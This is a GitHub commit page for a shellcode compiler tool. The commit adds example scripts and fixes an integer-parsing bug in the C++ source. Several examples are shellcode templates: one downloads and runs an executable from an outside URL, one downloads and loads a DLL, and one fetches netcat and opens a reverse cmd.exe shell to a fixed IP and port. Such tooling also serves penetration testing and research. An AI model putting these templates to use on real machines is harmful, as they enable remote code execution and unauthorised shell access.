Skip to content

Commit 69d67af

Browse files
NytroRSTNytroRST
committed
A few examples
Also fixed a bug (large integer)
1 parent 9c9e5b6 commit 69d67af

File tree

7 files changed

+50
-3
lines changed

7 files changed

+50
-3
lines changed

Examples/DaE.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
2+
function URLDownloadToFileA("urlmon.dll");
3+
function WinExec("kernel32.dll");
4+
function ExitProcess("kernel32.dll");
5+
6+
URLDownloadToFileA(0,"https://rstforums.com/fisiere/calc.exe","calc.exe",0,0);
7+
WinExec("calc.exe",0);
8+
ExitProcess(0);
9+

Examples/DaL.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
function URLDownloadToFileA("urlmon.dll");
2+
function LoadLibraryA("kernel32.dll");
3+
function ExitProcess("kernel32.dll");
4+
5+
URLDownloadToFileA(0,"https://rstforums.com/fisiere/DLLExample.dll","SC.dll",0,0);
6+
LoadLibraryA("SC.dll");
7+
ExitProcess(0);

Examples/File.txt

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
2+
function CopyFileA("kernel32.dll");
3+
function DeleteFileA("kernel32.dll");
4+
function ExitProcess("kernel32.dll");
5+
6+
CopyFileA("C:\Windows\System32\calc.exe","C:\Users\Ionut\Desktop\calc.exe",0);
7+
DeleteFileA("C:\Users\Ionut\Desktop\Delete.txt");
8+
ExitProcess(0);

Examples/Reg.txt

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
function RegSetKeyValueA("advapi32.dll");
2+
function ExitProcess("kernel32.dll");
3+
4+
RegSetKeyValueA(2147483649,"Software\Microsoft\Notepad","Test",1,"Nytro",5);
5+
ExitProcess(0);

Examples/Reverse.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
function URLDownloadToFileA("urlmon.dll");
2+
function WinExec("kernel32.dll");
3+
function ExitProcess("kernel32.dll");
4+
5+
URLDownloadToFileA(0,"https://rstforums.com/fisiere/nc.exe","nc.exe",0,0);
6+
WinExec("nc.exe -e cmd.exe 192.168.0.100 1337",0);
7+
ExitProcess(0);

Release/ShellcodeCompiler.exe

1.5 KB
Binary file not shown.

ShellcodeCompiler/ShellcodeCompiler.cpp

Lines changed: 14 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -112,7 +112,7 @@ void AddFunctionCallIntParameter(string p_sIntParameter)
112112
{
113113
Parameter Param;
114114
Param.Type = PARAMETER_TYPE_INT;
115-
Param.IntValue = stoi(p_sIntParameter);
115+
Param.IntValue = (size_t)stoll(p_sIntParameter);
116116
AllFunctionCalls[AllFunctionCallsNr].Parameters.push_back(Param);
117117
}
118118

@@ -408,6 +408,17 @@ size_t GetStringOffset(string p_sString)
408408
return 0;
409409
}
410410

411+
// Convert int to hex
412+
413+
string IntToHexString(size_t p_iNumber)
414+
{
415+
std::stringstream stream;
416+
stream << std::hex << p_iNumber;
417+
std::string result(stream.str());
418+
419+
return result;
420+
}
421+
411422
// Generate a call to LoadLibrary("string")
412423

413424
size_t NrBasesToStack = 0;
@@ -678,8 +689,8 @@ string GenerateFunctionCall(FunctionCall p_oFunctionCall)
678689
}
679690
else
680691
{
681-
sContent += "push ";
682-
sContent += to_string(p_oFunctionCall.Parameters[i].IntValue);
692+
sContent += "push 0x";
693+
sContent += IntToHexString(p_oFunctionCall.Parameters[i].IntValue);
683694
sContent += "\r\n";
684695
}
685696
}

0 commit comments

Comments
 (0)